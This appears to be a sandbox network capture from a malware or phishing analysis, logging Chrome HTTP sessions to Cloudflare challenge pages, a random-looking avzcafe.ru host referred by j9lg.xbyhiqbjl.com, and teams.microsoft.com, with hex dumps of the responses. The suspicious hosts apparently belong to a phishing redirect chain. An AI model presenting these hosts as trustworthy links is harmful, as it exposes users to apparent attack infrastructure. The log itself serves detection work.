                                                                                                                                                                                                                                                                            2024-12-03 17:59:10 UTC473INData Raw: 2b 62 45 78 64 52 6b 64 69 52 59 43 4b 55 47 56 59 62 59 31 59 64 49 61 56 57 5a 74 30 6e 56 39 37 6b 70 68 6a 58 70 36 6f 71 36 69 61 68 6d 46 36 6d 6f 4e 72 61 6f 47 56 67 4c 4b 33 68 33 70 75 66 4a 62 41 71 72 5a 2f 77 33 70 37 6d 49 61 68 6d 4b 69 45 6f 34 53 74 7a 70 43 2f 78 6f 75 70 79 74 4f 4e 30 36 6a 50 32 74 75 6c 76 74 2f 66 7a 38 75 78 76 65 50 53 74 64 4b 6a 76 62 69 72 70 4d 2f 41 32 75 62 47 39 4d 33 71 78 38 58 52 38 2b 4c 49 2b 37 54 66 41 4f 2b 38 37 4e 54 7a 41 4f 38 49 34 51 44 30 33 50 73 4c 34 39 34 42 2b 75 66 68 37 51 76 71 35 75 45 45 2b 68 33 32 2b 52 49 67 36 52 41 4c 38 66 30 67 45 66 55 6a 4a 41 7a 36 46 79 77 5a 4d 66 6f 53 4a 6a 55 66 4d 7a 51 35 44 54 59 61 45 44 67 31 39 69 6b 50 4d 52 59 75 45 43 51 79 48 42 31 47 2f 44
                                                                                                                                                                                                                                                                            Data Ascii: +bExdRkdiRYCKUGVYbY1YdIaVWZt0nV97kphjXp6oq6iahmF6moNraoGVgLK3h3pufJbAqrZ/w3p7mIahmKiEo4StzpC/xoupytON06jP2tulvt/fz8uxvePStdKjvbirpM/A2ubG9M3qx8XR8+LI+7TfAO+87NTzAO8I4QD03PsL494B+ufh7Qvq5uEE+h32+RIg6RAL8f0gEfUjJAz6FywZMfoSJjUfMzQ5DTYaEDg19ikPMRYuECQyHB1G/D


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            30192.168.2.449786104.18.94.414431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:11 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/487456068:1733246749:egPdjpMoJzfojSsctpNbepGP0MyEt9rjP3lowltZDOM/8ec5727f9d0241a1/xoj21sG.TgNYar2CTssEEZiD57H0pWQOKcnFFHsf_L0-1733248732-1.1.1.1-3806Ch6yrCyiGSADZ7Q5vE1UuMqEvbi58GgHh_28sc7_EOrCh7HNPU4l8oRObyeS HTTP/1.1
                                                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:59:12 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:12 GMT
                                                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                                                            Content-Length: 7
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            cf-chl-out: an19KthvZnQPOg3zPsLI4zVgdje8T+aAasI=$XkHb/gRY6L0kbO2b
                                                                                                                                                                                                                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            CF-RAY: 8ec572fc2c67efa1-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            2024-12-03 17:59:12 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                                                            Data Ascii: invalid


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            31192.168.2.449788104.21.3.444431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:13 UTC657OUTGET /mjiglbhvzysujfpfwkvfxrkFvoJkmovXLGALCDMYWHBJHQVGUVBUWEEDSMN HTTP/1.1
                                                                                                                                                                                                                                                                            Host: 0rela6wr6r9khl50cbgjotcbwa8davihjy3a64rapf6i1hzopzenn.avzcafe.ru
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Origin: https://j9lg.xbyhiqbjl.com
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                            Referer: https://j9lg.xbyhiqbjl.com/
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:59:14 UTC891INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:14 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p3soWssxMBA7SG8zEUBpARrPt79kCPMSgL12va4aW6UX1%2Fe5PJbP2sRyiZGKIQdic3cHJSzAPVTGiFbYDKOfwA%2FXScVNKdGRmVyTkBsfaLn%2FzQlJpzlqjjfHpcUYehHMOx0CS97YzQK%2F3%2FeQMejLWCK%2BcnTL%2BnFz1NQkIKVd8F1LFp2mlfX4u2GTxJ4FdmDJMuVV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            CF-RAY: 8ec573064dbade92-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1666&rtt_var=627&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1235&delivery_rate=1741204&cwnd=236&unsent_bytes=0&cid=b40e9c6449da2e23&ts=1157&x=0"
                                                                                                                                                                                                                                                                            2024-12-03 17:59:14 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 11
                                                                                                                                                                                                                                                                            2024-12-03 17:59:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            32192.168.2.44979052.123.129.144431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:16 UTC686OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                            Host: teams.microsoft.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                            Referer: https://j9lg.xbyhiqbjl.com/
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:59:16 UTC761INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                            Location: https://teams.microsoft.com/v2?clientexperience=t2
                                                                                                                                                                                                                                                                            strict-transport-security: max-age=2592000
                                                                                                                                                                                                                                                                            x-ring-info: web: general [assigned], mt: general [assigned]
                                                                                                                                                                                                                                                                            requestid: ec311245ee7a5ce0c44db8e35c398aa5
                                                                                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                                                                                            timing-allow-origin: *
                                                                                                                                                                                                                                                                            x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                            x-envoy-upstream-service-time: 8
                                                                                                                                                                                                                                                                            x-request-id: 541f45fa-b27a-4339-888e-0ac488eac8de
                                                                                                                                                                                                                                                                            X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: 85C28EB7AC754C6FBCF53A4F64EC38EB Ref B: EWR30EDGE0919 Ref C: 2024-12-03T17:59:16Z
                                                                                                                                                                                                                                                                            Set-Cookie: MUIDB=28C464D8E51F67EE36DA7192E47D666E; path=/; httponly; secure; expires=Sun, 28-Dec-2025 17:59:16 GMT
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:16 GMT
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            33192.168.2.44978952.123.129.144431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:16 UTC756OUTGET /v2?clientexperience=t2 HTTP/1.1
                                                                                                                                                                                                                                                                            Host: teams.microsoft.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                            Referer: https://j9lg.xbyhiqbjl.com/
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            Cookie: MUIDB=28C464D8E51F67EE36DA7192E47D666E
                                                                                                                                                                                                                                                                            2024-12-03 17:59:17 UTC249INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                            Location: /v2/?clientexperience=t2
                                                                                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: 1DE4A8A7BD5F47978A7371050BDDFC11 Ref B: EWR30EDGE0915 Ref C: 2024-12-03T17:59:16Z
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:16 GMT
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            34192.168.2.449792104.21.3.444431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:17 UTC447OUTGET /mjiglbhvzysujfpfwkvfxrkFvoJkmovXLGALCDMYWHBJHQVGUVBUWEEDSMN HTTP/1.1
                                                                                                                                                                                                                                                                            Host: 0rela6wr6r9khl50cbgjotcbwa8davihjy3a64rapf6i1hzopzenn.avzcafe.ru
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:59:18 UTC889INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:18 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5h%2BG6Bi3aaSEn4%2Bi1UIeJU15Lf2EXG4u8QgpFpm5M%2BxDHEdoLlvsqrKAfASXnOLV1hPnkr8WoGetGDeZ9ZIPJvW2exVQ07DNmDd7OY7C4Lbm2u2njVrDfuOuEoGXyumIaaxtGTUWCDPU4p1eIfomdln7n3vs%2B6ugJq586BzrFbt%2B5f5e2TnCUG0UE3eur%2Fj7Mcji"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            CF-RAY: 8ec5731ded4defa1-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1846&min_rtt=1840&rtt_var=703&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1025&delivery_rate=1542525&cwnd=154&unsent_bytes=0&cid=d1eaacd843130f31&ts=1179&x=0"
                                                                                                                                                                                                                                                                            2024-12-03 17:59:18 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 11
                                                                                                                                                                                                                                                                            2024-12-03 17:59:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            35192.168.2.44979352.123.129.144431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:18 UTC757OUTGET /v2/?clientexperience=t2 HTTP/1.1
                                                                                                                                                                                                                                                                            Host: teams.microsoft.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                            Referer: https://j9lg.xbyhiqbjl.com/
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            Cookie: MUIDB=28C464D8E51F67EE36DA7192E47D666E
                                                                                                                                                                                                                                                                            2024-12-03 17:59:19 UTC7970INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Cache-Control: no-store, no-transform, must-revalidate, no-cache
                                                                                                                                                                                                                                                                            Content-Length: 309070
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                            Expires: Mon, 02 Dec 2024 17:59:18 GMT
                                                                                                                                                                                                                                                                            Set-Cookie: clocale=en-us; expires=Wed, 03 Dec 2025 17:59:18 GMT; path=/;Partitioned; secure; httponly
                                                                                                                                                                                                                                                                            strict-transport-security: max-age=2592000
                                                                                                                                                                                                                                                                            x-ring-info: web: general [assigned];
                                                                                                                                                                                                                                                                            cross-origin-opener-policy: same-origin-allow-popups
                                                                                                                                                                                                                                                                            content-security-policy: block-all-mixed-content;base-uri 'none';child-src blob: data: https:;connect-src 'self' blob: data: https: http://localhost:4318 *.office.net ws://localhost:* wss://127.0.0.1:9002 wss://view-localhost:* wss://*.svc.ms wss://augloop-dogfood.officeppe.com wss://augloop.office.com wss://augloop.svc.cloud.microsoft wss://augloop-gcc.office.com wss://*.augloop-dogfood.officeppe.com wss://*.augloop.office.com wss://*.augloop-gcc.office.com wss://*.augloop.svc.cloud.microsoft wss://*.pptservicescast.edog.officeapps.live.com wss://*.pptservicescast.officeapps.live.com wss://pptservicescast.edog.officeapps.live.com wss://pptservicescast.gcc.osi.office365.us wss://pptservicescast.officeapps.live.com wss://pptservicescast.osi.office365.us wss://*.attend.teams.microsoft.com wss://*.attend.teams.microsoft.net wss://*.attend.gcc.teams.microsoft.com wss://attend.gcc.teams.microsoft.com wss://*.cts.azure.us wss://*.cts.speech.microsoft.com wss://*.cts.speech-test.microsoft.com wss://*.enterprisevoice [TRUNCATED]
                                                                                                                                                                                                                                                                            content-security-policy-report-only: img-src 'self' blob: data: https://statics.teams.cdn.office.net *.ams.gcc.teams.microsoft.com *.asm.skype.com *.asyncgw.teams.microsoft.com *.giphy.com *.loki.delve.office.com *.office.net *.officeapps.live.com *.sharepoint-df.com *.sharepoint.com bot-framework.azureedge.net connectoricons-prod.azureedge.net content.powerapps.com docs.botframework.com i.vimeocdn.com i.ytimg.com local.teams.office.com:* marketplacecdn.azureedge.net media.licdn.com outlook.office.com pbs.twimg.com raw.githubusercontent.com skypeteamsbotstorage.blob.core.windows.net statics.teams.microsoft.com substrate.office.com teams.microsoft.com urlp.sfbassets.com www.odwebp.svc.ms;frame-src https: mailto: ms-appx-web: ms-excel: ms-powerpoint: ms-visio: ms-whiteboard-preview: ms-word: msteams: onenote: pdf: sip: sips:;script-src 'nonce-jZVPeXHbBhvbbHy6COtQvA==' 'report-sample' https://statics.teams.cdn.office.net browser.events.data.microsoft.com local.teams.microsoft.invalid c1-powerpoint-15.cdn.office. [TRUNCATED]
                                                                                                                                                                                                                                                                            requestid: 6121ede1c447b773bd9ace98d70af2f3
                                                                                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                                                                                            timing-allow-origin: *
                                                                                                                                                                                                                                                                            x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                            x-envoy-upstream-service-time: 9
                                                                                                                                                                                                                                                                            x-request-id: 480c6d60-1b3f-48fe-94e0-d22114e79d9d
                                                                                                                                                                                                                                                                            X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: 12D774E88E4F4551B7A58671BC1D6311 Ref B: EWR30EDGE0906 Ref C: 2024-12-03T17:59:18Z
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:18 GMT
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-03 17:59:19 UTC252INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 20 64 61 74 61 2d 63 6f 6e 66 69 67 3d 22 25 37 42 25 32 32 72 69 6e 67 25 32 32 25 33 41 25 37 42 25 32 32 69 64 25 32 32 25 33 41 25 32 32 67 65 6e 65 72 61 6c 25 32 32 25 37 44 25 32 43 25 32 32 65 6e 76 69 72 6f 6e 6d 65 6e 74 25 32 32 25 33 41 25 32 32 70 72 6f 64 25 32 32 25 32 43 25 32 32 6c 6f 63 61 6c 65 43 6f 64 65 25 32 32 25 33 41 25 32 32 65 6e 2d 75 73 25 32 32 25 32 43 25 32 32 75 6e 61 75 74 68 65 6e 74 69 63 61 74 65 64 25 32 32 25 33 41 74 72 75 65 25 32 43 25 32 32 70 64 73 45 6e 76 69 72 6f 6e 6d 65 6e 74 25 32 32 25 33 41 25 32 32 70 64 73 2d 70 72 6f 64 2d 63 6f 73 6d 69 63 2d 75 73 65 61 32 25 32 32 25 32 43 25 32 32
                                                                                                                                                                                                                                                                            Data Ascii: <!doctype html><html lang="en"><head data-config="%7B%22ring%22%3A%7B%22id%22%3A%22general%22%7D%2C%22environment%22%3A%22prod%22%2C%22localeCode%22%3A%22en-us%22%2C%22unauthenticated%22%3Atrue%2C%22pdsEnvironment%22%3A%22pds-prod-cosmic-usea2%22%2C%22
                                                                                                                                                                                                                                                                            2024-12-03 17:59:19 UTC8192INData Raw: 69 73 4f 63 64 69 25 32 32 25 33 41 66 61 6c 73 65 25 32 43 25 32 32 65 6e 61 62 6c 65 49 66 72 61 6d 65 43 68 65 63 6b 49 6e 57 65 62 42 6f 6f 74 41 74 74 65 6d 70 74 43 6f 75 6e 74 65 72 25 32 32 25 33 41 74 72 75 65 25 32 43 25 32 32 65 6e 61 62 6c 65 55 6e 72 65 67 69 73 74 65 72 53 57 57 68 65 6e 43 6c 69 65 6e 74 53 74 61 72 74 46 61 69 6c 25 32 32 25 33 41 74 72 75 65 25 32 43 25 32 32 65 6e 61 62 6c 65 53 72 69 44 49 55 6e 61 75 74 68 65 6e 74 69 63 61 74 65 64 25 32 32 25 33 41 74 72 75 65 25 37 44 22 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 6a 5a 56 50 65 58 48 62 42 68 76 62 62 48 79 36 43 4f 74 51 76 41 3d 3d 22 3e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 28 29 3e 35 65 33 3f 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 61 72 6b 28 22 73
                                                                                                                                                                                                                                                                            Data Ascii: isOcdi%22%3Afalse%2C%22enableIframeCheckInWebBootAttemptCounter%22%3Atrue%2C%22enableUnregisterSWWhenClientStartFail%22%3Atrue%2C%22enableSriDIUnauthenticated%22%3Atrue%7D"><script nonce="jZVPeXHbBhvbbHy6COtQvA==">performance.now()>5e3?performance.mark("s
                                                                                                                                                                                                                                                                            2024-12-03 17:59:19 UTC103INData Raw: 36 63 55 41 55 2b 4a 7a 63 4c 76 38 77 46 63 6f 31 57 59 59 4e 5a 68 39 4f 44 67 58 46 44 53 6d 41 74 67 3d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 73 2e 74 65 61 6d 73 2e 63 64 6e 2e 6f 66 66 69 63 65 2e 6e 65 74 2f 74 65 61 6d
                                                                                                                                                                                                                                                                            Data Ascii: 6cUAU+JzcLv8wFco1WYYNZh9ODgXFDSmAtg=" crossorigin><link href="https://statics.teams.cdn.office.net/team
                                                                                                                                                                                                                                                                            2024-12-03 17:59:19 UTC8192INData Raw: 73 2d 6d 6f 64 75 6c 61 72 2d 70 61 63 6b 61 67 65 73 2f 68 61 73 68 65 64 2d 61 73 73 65 74 73 2f 39 30 30 31 36 31 2d 34 61 33 63 32 61 36 39 62 38 66 63 38 35 65 31 2e 6a 73 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 32 35 36 2d 68 39 56 6b 4b 62 45 64 73 69 53 35 33 54 6b 73 4f 41 34 4c 35 74 49 34 6e 4e 32 79 30 77 36 57 35 68 65 59 61 6a 4d 6c 34 47 63 3d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 73 2e 74 65 61 6d 73 2e 63 64 6e 2e 6f 66 66 69 63 65 2e 6e 65 74 2f 74 65 61 6d 73 2d 6d 6f 64 75 6c 61 72 2d 70 61 63 6b 61 67 65 73 2f 68 61 73 68 65 64 2d 61 73 73 65 74 73 2f 32 33 32 30 34 32
                                                                                                                                                                                                                                                                            Data Ascii: s-modular-packages/hashed-assets/900161-4a3c2a69b8fc85e1.js" as="script" rel="preload" integrity="sha256-h9VkKbEdsiS53TksOA4L5tI4nN2y0w6W5heYajMl4Gc=" crossorigin><link href="https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/232042
                                                                                                                                                                                                                                                                            2024-12-03 17:59:19 UTC8192INData Raw: 2e 6e 65 74 2f 74 65 61 6d 73 2d 6d 6f 64 75 6c 61 72 2d 70 61 63 6b 61 67 65 73 2f 68 61 73 68 65 64 2d 61 73 73 65 74 73 2f 34 30 30 35 33 32 2d 31 32 38 39 64 38 61 39 30 65 33 36 37 31 63 65 2e 6a 73 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 32 35 36 2d 4c 47 7a 66 55 50 62 36 58 6f 57 63 66 66 4d 39 7a 56 4f 79 48 73 57 32 42 46 34 54 48 6b 38 71 62 36 35 67 4a 56 39 61 30 36 77 3d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 73 2e 74 65 61 6d 73 2e 63 64 6e 2e 6f 66 66 69 63 65 2e 6e 65 74 2f 74 65 61 6d 73 2d 6d 6f 64 75 6c 61 72 2d 70 61 63 6b 61 67 65 73 2f 68 61 73 68 65 64 2d 61 73 73 65
                                                                                                                                                                                                                                                                            Data Ascii: .net/teams-modular-packages/hashed-assets/400532-1289d8a90e3671ce.js" as="script" rel="preload" integrity="sha256-LGzfUPb6XoWcffM9zVOyHsW2BF4THk8qb65gJV9a06w=" crossorigin><link href="https://statics.teams.cdn.office.net/teams-modular-packages/hashed-asse
                                                                                                                                                                                                                                                                            2024-12-03 17:59:19 UTC101INData Raw: 6e 49 74 57 4c 52 67 4c 61 38 7a 62 67 5a 69 67 78 61 76 68 46 65 70 69 64 67 31 46 66 74 4c 61 57 2f 2f 57 41 50 76 41 3d 22 2c 69 73 50 6f 6c 79 66 69 6c 6c 3a 21 31 7d 5d 2c 61 73 79 6e 63 45 6e 74 72 79 3a 7b 63 68 75 6e 6b 73 3a 5b 7b 70 61 74 68 3a 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 73
                                                                                                                                                                                                                                                                            Data Ascii: nItWLRgLa8zbgZigxavhFepidg1FftLaW//WAPvA=",isPolyfill:!1}],asyncEntry:{chunks:[{path:"https://statics
